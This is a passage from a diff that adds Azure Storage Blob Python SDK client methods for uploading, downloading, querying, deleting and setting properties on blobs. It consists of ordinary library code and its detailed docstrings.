equals (=), underscore (_) + :paramtype tags: dict(str, str) + :keyword bytearray source_content_md5: + Specify the md5 that is used to verify the integrity of the source bytes. + :keyword ~datetime.datetime source_if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the source resource has been modified since the specified time. + :keyword ~datetime.datetime source_if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the source resource has not been modified since the specified date/time. + :keyword str source_etag: + The source ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions source_match_condition: + The source match condition to use upon the etag. + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + The destination ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The destination match condition to use upon the etag. + :keyword destination_lease: + The lease ID specified for this header must match the lease ID of the + destination blob. If the request does not include the lease ID or it is not + valid, the operation fails with status code 412 (Precondition Failed). + :paramtype destination_lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword int timeout: + The timeout parameter is expressed in seconds. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword str source_authorization: + Authenticate as a service principal using a client secret to access a source blob. Ensure "bearer " is + the prefix of the source_authorization string. + """ + options = self._upload_blob_from_url_options( + source_url=self._encode_source_url(source_url), + **kwargs) + try: + return self._client.block_blob.put_blob_from_url(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def upload_blob( # pylint: disable=too-many-locals + self, data, # type: Union[AnyStr, Iterable[AnyStr], IO[AnyStr]] + blob_type=BlobType.BlockBlob, # type: Union[str, BlobType] + length=None, # type: Optional[int] + metadata=None, # type: Optional[Dict[str, str]] + **kwargs + ): + # type: (...) -> Any + """Creates a new blob from a data source with automatic chunking. + + :param data: The blob data to upload. + :param ~azure.storage.blob.BlobType blob_type: The type of the blob. This can be + either BlockBlob, PageBlob or AppendBlob. The default value is BlockBlob. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :param metadata: + Name-value pairs associated with the blob as metadata. + :type metadata: dict(str, str) + :keyword tags: + Name-value pairs associated with the blob as tag. Tags are case-sensitive. + The tag set may contain at most 10 tags. Tag keys must be between 1 and 128 characters, + and tag values must be between 0 and 256 characters. + Valid tag key and value characters include: lowercase and uppercase letters, digits (0-9), + space (` `), plus (+), minus (-), period (.), solidus (/), colon (:), equals (=), underscore (_) + + .. versionadded:: 12.4.0 + + :paramtype tags: dict(str, str) + :keyword bool overwrite: Whether the blob to be uploaded should overwrite the current data. + If True, upload_blob will overwrite the existing data. If set to False, the + operation will fail with ResourceExistsError. The exception to the above is with Append + blob types: if set to False and the data already exists, an error will not be raised + and the data will be appended to the existing blob. If set overwrite=True, then the existing + append blob will be deleted, and a new one created. Defaults to False. + :keyword ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, upload_blob only succeeds if the + blob's lease is active and matches this ID. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.PremiumPageBlobTier premium_page_blob_tier: + A page blob tier value to set the blob to. The tier correlates to the size of the + blob and number of allowed IOPS. This is only applicable to page blobs on + premium storage accounts. + :keyword ~azure.storage.blob.StandardBlobTier standard_blob_tier: + A standard blob tier value to set the blob to. For this version of the library, + this is only applicable to block blobs on standard storage accounts. + :keyword ~azure.storage.blob.ImmutabilityPolicy immutability_policy: + Specifies the immutability policy of a blob, blob snapshot or blob version. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword bool legal_hold: + Specified if a legal hold should be set on the blob. + Currently this parameter of upload_blob() API is for BlockBlob only. + + .. versionadded:: 12.10.0 + This was introduced in API version '2020-10-02'. + + :keyword int maxsize_condition: + Optional conditional header. The max length in bytes permitted for + the append blob. If the Append Block operation would cause the blob + to exceed that limit or if the blob size is already greater than the + value specified in this header, the request will fail with + MaxBlobSizeConditionNotMet error (HTTP status code 412 - Precondition Failed). + :keyword int max_concurrency: + Maximum number of parallel connections to use when the blob size exceeds + 64MB. + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword str encryption_scope: + A predefined encryption scope used to encrypt the data on the service. An encryption + scope can be created using the Management API and referenced here by name. If a default + encryption scope has been defined at the container, this value will override it if the + container-level scope is configured to allow overrides. Otherwise an error will be raised. + + .. versionadded:: 12.2.0 + + :keyword str encoding: + Defaults to UTF-8. + :keyword progress_hook: + A callback to track the progress of a long running upload. The signature is + function(current: int, total: Optional[int]) where current is the number of bytes transfered + so far, and total is the size of the blob or None if the size is unknown. + :paramtype progress_hook: Callable[[int, Optional[int]], None] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: dict[str, Any] + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world.py + :start-after: [START upload_a_blob] + :end-before: [END upload_a_blob] + :language: python + :dedent: 12 + :caption: Upload a blob to the container. + """ + options = self._upload_blob_options( + data, + blob_type=blob_type, + length=length, + metadata=metadata, + **kwargs) + if blob_type == BlobType.BlockBlob: + return upload_block_blob(**options) + if blob_type == BlobType.PageBlob: + return upload_page_blob(**options) + return upload_append_blob(**options) + + def _download_blob_options(self, offset=None, length=None, **kwargs): + # type: (Optional[int], Optional[int], **Any) -> Dict[str, Any] + if self.require_encryption and not self.key_encryption_key: + raise ValueError("Encryption required but no key was provided.") + if length is not None and offset is None: + raise ValueError("Offset value must not be None if length is set.") + if length is not None: + length = offset + length - 1 # Service actually uses an end-range inclusive index + + validate_content = kwargs.pop('validate_content', False) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + + options = { + 'clients': self._client, + 'config': self._config, + 'start_range': offset, + 'end_range': length, + 'version_id': kwargs.pop('version_id', None), + 'validate_content': validate_content, + 'encryption_options': { + 'required': self.require_encryption, + 'key': self.key_encryption_key, + 'resolver': self.key_resolver_function}, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'cls': kwargs.pop('cls', None) or deserialize_blob_stream, + 'max_concurrency':kwargs.pop('max_concurrency', 1), + 'encoding': kwargs.pop('encoding', None), + 'timeout': kwargs.pop('timeout', None), + 'name': self.blob_name, + 'container': self.container_name} + options.update(kwargs) + return options + + @distributed_trace + def download_blob(self, offset=None, length=None, **kwargs): + # type: (Optional[int], Optional[int], **Any) -> StorageStreamDownloader + """Downloads a blob to the StorageStreamDownloader. The readall() method must + be used to read all the content or readinto() must be used to download the blob into + a stream. Using chunks() returns an iterator which allows the user to iterate over the content in chunks. + + :param int offset: + Start of byte range to use for downloading a section of the blob. + Must be set if length is provided. + :param int length: + Number of bytes to read from the stream. This is optional, but + should be supplied for optimal performance. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to download. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword bool validate_content: + If true, calculates an MD5 hash for each chunk of the blob. The storage + service checks the hash of the content that has arrived with the hash + that was sent. This is primarily valuable for detecting bitflips on + the wire if using http instead of https, as https (the default), will + already validate. Note that this MD5 hash is not stored with the + blob. Also note that if enabled, the memory-efficient upload algorithm + will not be used because computing the MD5 hash requires buffering + entire blocks, and doing so defeats the purpose of the memory-efficient algorithm. + :keyword lease: + Required if the blob has an active lease. If specified, download_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int max_concurrency: + The number of parallel connections with which to download. + :keyword str encoding: + Encoding to decode the downloaded bytes. Default is None, i.e. no decoding. + :keyword progress_hook: + A callback to track the progress of a long running download. The signature is + function(current: int, total: int) where current is the number of bytes transfered + so far, and total is the total size of the download. + :paramtype progress_hook: Callable[[int, int], None] + :keyword int timeout: + The timeout parameter is expressed in seconds. This method may make + multiple calls to the Azure service and the timeout will apply to + each call individually. + :returns: A streaming object (StorageStreamDownloader) + :rtype: ~azure.storage.blob.StorageStreamDownloader + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world.py + :start-after: [START download_a_blob] + :end-before: [END download_a_blob] + :language: python + :dedent: 12 + :caption: Download a blob. + """ + options = self._download_blob_options( + offset=offset, + length=length, + **kwargs) + return StorageStreamDownloader(**options) + + def _quick_query_options(self, query_expression, + **kwargs): + # type: (str, **Any) -> Dict[str, Any] + delimiter = '\n' + input_format = kwargs.pop('blob_format', None) + if input_format == QuickQueryDialect.DelimitedJson: + input_format = DelimitedJsonDialect() + if input_format == QuickQueryDialect.DelimitedText: + input_format = DelimitedTextDialect() + input_parquet_format = input_format == "ParquetDialect" + if input_format and not input_parquet_format: + try: + delimiter = input_format.lineterminator + except AttributeError: + try: + delimiter = input_format.delimiter + except AttributeError: + raise ValueError("The Type of blob_format can only be DelimitedTextDialect or " + "DelimitedJsonDialect or ParquetDialect") + output_format = kwargs.pop('output_format', None) + if output_format == QuickQueryDialect.DelimitedJson: + output_format = DelimitedJsonDialect() + if output_format == QuickQueryDialect.DelimitedText: + output_format = DelimitedTextDialect() + if output_format: + if output_format == "ParquetDialect": + raise ValueError("ParquetDialect is invalid as an output format.") + try: + delimiter = output_format.lineterminator + except AttributeError: + try: + delimiter = output_format.delimiter + except AttributeError: + pass + else: + output_format = input_format if not input_parquet_format else None + query_request = QueryRequest( + expression=query_expression, + input_serialization=serialize_query_format(input_format), + output_serialization=serialize_query_format(output_format) + ) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo( + encryption_key=cpk.key_value, + encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm + ) + options = { + 'query_request': query_request, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_info': cpk_info, + 'snapshot': self.snapshot, + 'timeout': kwargs.pop('timeout', None), + 'cls': return_headers_and_deserialized, + } + options.update(kwargs) + return options, delimiter + + @distributed_trace + def query_blob(self, query_expression, **kwargs): + # type: (str, **Any) -> BlobQueryReader + """Enables users to select/project on blob/or blob snapshot data by providing simple query expressions. + This operations returns a BlobQueryReader, users need to use readall() or readinto() to get query data. + + :param str query_expression: + Required. a query statement. + :keyword Callable[~azure.storage.blob.BlobQueryError] on_error: + A function to be called on any processing errors returned by the service. + :keyword blob_format: + Optional. Defines the serialization of the data currently stored in the blob. The default is to + treat the blob data as CSV data formatted in the default dialect. This can be overridden with + a custom DelimitedTextDialect, or DelimitedJsonDialect or "ParquetDialect" (passed as a string or enum). + These dialects can be passed through their respective classes, the QuickQueryDialect enum or as a string + :paramtype blob_format: ~azure.storage.blob.DelimitedTextDialect or ~azure.storage.blob.DelimitedJsonDialect + or ~azure.storage.blob.QuickQueryDialect or str + :keyword output_format: + Optional. Defines the output serialization for the data stream. By default the data will be returned + as it is represented in the blob (Parquet formats default to DelimitedTextDialect). + By providing an output format, the blob data will be reformatted according to that profile. + This value can be a DelimitedTextDialect or a DelimitedJsonDialect or ArrowDialect. + These dialects can be passed through their respective classes, the QuickQueryDialect enum or as a string + :paramtype output_format: ~azure.storage.blob.DelimitedTextDialect or ~azure.storage.blob.DelimitedJsonDialect + or list[~azure.storage.blob.ArrowDialect] or ~azure.storage.blob.QuickQueryDialect or str + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: A streaming object (BlobQueryReader) + :rtype: ~azure.storage.blob.BlobQueryReader + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_query.py + :start-after: [START query] + :end-before: [END query] + :language: python + :dedent: 4 + :caption: select/project on blob/or blob snapshot data by providing simple query expressions. + """ + errors = kwargs.pop("on_error", None) + error_cls = kwargs.pop("error_cls", BlobQueryError) + encoding = kwargs.pop("encoding", None) + options, delimiter = self._quick_query_options(query_expression, **kwargs) + try: + headers, raw_response_body = self._client.blob.query(**options) + except HttpResponseError as error: + process_storage_error(error) + return BlobQueryReader( + name=self.blob_name, + container=self.container_name, + errors=errors, + record_delimiter=delimiter, + encoding=encoding, + headers=headers, + response=raw_response_body, + error_cls=error_cls) + + @staticmethod + def _generic_delete_blob_options(delete_snapshots=None, **kwargs): + # type: (str, **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + if delete_snapshots: + delete_snapshots = DeleteSnapshotsOptionType(delete_snapshots) + options = { + 'timeout': kwargs.pop('timeout', None), + 'snapshot': kwargs.pop('snapshot', None), # this is added for delete_blobs + 'delete_snapshots': delete_snapshots or None, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions} + options.update(kwargs) + return options + + def _delete_blob_options(self, delete_snapshots=None, **kwargs): + # type: (str, **Any) -> Dict[str, Any] + if self.snapshot and delete_snapshots: + raise ValueError("The delete_snapshots option cannot be used with a specific snapshot.") + options = self._generic_delete_blob_options(delete_snapshots, **kwargs) + options['snapshot'] = self.snapshot + options['version_id'] = kwargs.pop('version_id', None) + options['blob_delete_type'] = kwargs.pop('blob_delete_type', None) + return options + + @distributed_trace + def delete_blob(self, delete_snapshots=None, **kwargs): + # type: (str, **Any) -> None + """Marks the specified blob for deletion. + + The blob is later deleted during garbage collection. + Note that in order to delete a blob, you must delete all of its + snapshots. You can delete both at the same time with the delete_blob() + operation. + + If a delete retention policy is enabled for the service, then this operation soft deletes the blob + and retains the blob for a specified number of days. + After the specified number of days, the blob's data is removed from the service during garbage collection. + Soft deleted blob is accessible through :func:`~ContainerClient.list_blobs()` specifying `include=['deleted']` + option. Soft-deleted blob can be restored using :func:`undelete` operation. + + :param str delete_snapshots: + Required if the blob has associated snapshots. Values include: + - "only": Deletes only the blobs snapshots. + - "include": Deletes the blob along with all snapshots. + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to delete. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword lease: + Required if the blob has an active lease. If specified, delete_blob only + succeeds if the blob's lease is active and matches this ID. Value can be a + BlobLeaseClient object or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_hello_world.py + :start-after: [START delete_blob] + :end-before: [END delete_blob] + :language: python + :dedent: 12 + :caption: Delete a blob. + """ + options = self._delete_blob_options(delete_snapshots=delete_snapshots, **kwargs) + try: + self._client.blob.delete(**options) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace + def undelete_blob(self, **kwargs): + # type: (**Any) -> None + """Restores soft-deleted blobs or snapshots. + + Operation will only be successful if used within the specified number of days + set in the delete retention policy. + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :rtype: None + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START undelete_blob] + :end-before: [END undelete_blob] + :language: python + :dedent: 8 + :caption: Undeleting a blob. + """ + try: + self._client.blob.undelete(timeout=kwargs.pop('timeout', None), **kwargs) + except HttpResponseError as error: + process_storage_error(error) + + @distributed_trace() + def exists(self, **kwargs): + # type: (**Any) -> bool + """ + Returns True if a blob exists with the defined parameters, and returns + False otherwise. + + :kwarg str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to check if it exists. + :kwarg int timeout: + The timeout parameter is expressed in seconds. + :returns: boolean + """ + try: + self._client.blob.get_properties( + snapshot=self.snapshot, + **kwargs) + return True + # Encrypted with CPK + except ResourceExistsError: + return True + except HttpResponseError as error: + try: + process_storage_error(error) + except ResourceNotFoundError: + return False + + @distributed_trace + def get_blob_properties(self, **kwargs): + # type: (**Any) -> BlobProperties + """Returns all user-defined metadata, standard HTTP properties, and + system properties for the blob. It does not return the content of the blob. + + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword str version_id: + The version id parameter is an opaque DateTime + value that, when present, specifies the version of the blob to get properties. + + .. versionadded:: 12.4.0 + This keyword argument was introduced in API version '2019-12-12'. + + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword ~azure.storage.blob.CustomerProvidedEncryptionKey cpk: + Encrypts the data on the service-side with the given key. + Use of customer-provided keys must be done over HTTPS. + As the encryption key itself is provided in the request, + a secure connection must be established to transfer the key. + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: BlobProperties + :rtype: ~azure.storage.blob.BlobProperties + + .. admonition:: Example: + + .. literalinclude:: ../samples/blob_samples_common.py + :start-after: [START get_blob_properties] + :end-before: [END get_blob_properties] + :language: python + :dedent: 8 + :caption: Getting the properties for a blob. + """ + # TODO: extract this out as _get_blob_properties_options + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + try: + cls_method = kwargs.pop('cls', None) + if cls_method: + kwargs['cls'] = partial(deserialize_pipeline_response_into_cls, cls_method) + blob_props = self._client.blob.get_properties( + timeout=kwargs.pop('timeout', None), + version_id=kwargs.pop('version_id', None), + snapshot=self.snapshot, + lease_access_conditions=access_conditions, + modified_access_conditions=mod_conditions, + cls=kwargs.pop('cls', None) or deserialize_blob_properties, + cpk_info=cpk_info, + **kwargs) + except HttpResponseError as error: + process_storage_error(error) + blob_props.name = self.blob_name + if isinstance(blob_props, BlobProperties): + blob_props.container = self.container_name + blob_props.snapshot = self.snapshot + return blob_props # type: ignore + + def _set_http_headers_options(self, content_settings=None, **kwargs): + # type: (Optional[ContentSettings], **Any) -> Dict[str, Any] + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + blob_headers = None + if content_settings: + blob_headers = BlobHTTPHeaders( + blob_cache_control=content_settings.cache_control, + blob_content_type=content_settings.content_type, + blob_content_md5=content_settings.content_md5, + blob_content_encoding=content_settings.content_encoding, + blob_content_language=content_settings.content_language, + blob_content_disposition=content_settings.content_disposition + ) + options = { + 'timeout': kwargs.pop('timeout', None), + 'blob_http_headers': blob_headers, + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cls': return_response_headers} + options.update(kwargs) + return options + + @distributed_trace + def set_http_headers(self, content_settings=None, **kwargs): + # type: (Optional[ContentSettings], **Any) -> None + """Sets system properties on the blob. + + If one property is set for the content_settings, all properties will be overridden. + + :param ~azure.storage.blob.ContentSettings content_settings: + ContentSettings object used to set blob properties. Used to set content type, encoding, + language, disposition, md5, and cache control. + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + :keyword str etag: + An ETag value, or the wildcard character (*). Used to check if the resource has changed, + and act according to the condition specified by the `match_condition` parameter. + :keyword ~azure.core.MatchConditions match_condition: + The match condition to use upon the etag. + :keyword str if_tags_match_condition: + Specify a SQL where clause on blob tags to operate only on blob with a matching value. + eg. ``\"\\\"tagname\\\"='my tag'\"`` + + .. versionadded:: 12.4.0 + + :keyword int timeout: + The timeout parameter is expressed in seconds. + :returns: Blob-updated property dict (Etag and last modified) + :rtype: Dict[str, Any] + """ + options = self._set_http_headers_options(content_settings=content_settings, **kwargs) + try: + return self._client.blob.set_http_headers(**options) # type: ignore + except HttpResponseError as error: + process_storage_error(error) + + def _set_blob_metadata_options(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Any] + headers = kwargs.pop('headers', {}) + headers.update(add_metadata_headers(metadata)) + access_conditions = get_access_conditions(kwargs.pop('lease', None)) + mod_conditions = get_modify_conditions(kwargs) + cpk_scope_info = get_cpk_scope_info(kwargs) + + cpk = kwargs.pop('cpk', None) + cpk_info = None + if cpk: + if self.scheme.lower() != 'https': + raise ValueError("Customer provided encryption key must be used over HTTPS.") + cpk_info = CpkInfo(encryption_key=cpk.key_value, encryption_key_sha256=cpk.key_hash, + encryption_algorithm=cpk.algorithm) + options = { + 'timeout': kwargs.pop('timeout', None), + 'lease_access_conditions': access_conditions, + 'modified_access_conditions': mod_conditions, + 'cpk_scope_info': cpk_scope_info, + 'cpk_info': cpk_info, + 'cls': return_response_headers, + 'headers': headers} + options.update(kwargs) + return options + + @distributed_trace + def set_blob_metadata(self, metadata=None, **kwargs): + # type: (Optional[Dict[str, str]], **Any) -> Dict[str, Union[str, datetime]] + """Sets user-defined metadata for the blob as one or more name-value pairs. + + :param metadata: + Dict containing name and value pairs. Each call to this operation + replaces all existing metadata attached to the blob. To remove all + metadata from the blob, call this operation with no metadata headers. + :type metadata: dict(str, str) + :keyword lease: + Required if the blob has an active lease. Value can be a BlobLeaseClient object + or the lease ID as a string. + :paramtype lease: ~azure.storage.blob.BlobLeaseClient or str + :keyword ~datetime.datetime if_modified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only + if the resource has been modified since the specified time. + :keyword ~datetime.datetime if_unmodified_since: + A DateTime value. Azure expects the date value passed in to be UTC. + If timezone is included, any non-UTC datetimes will be converted to UTC. + If a date is passed in without timezone info, it is assumed to be UTC. + Specify this header to perform the operation only if + the resource has not been modified since the specified date/time. + 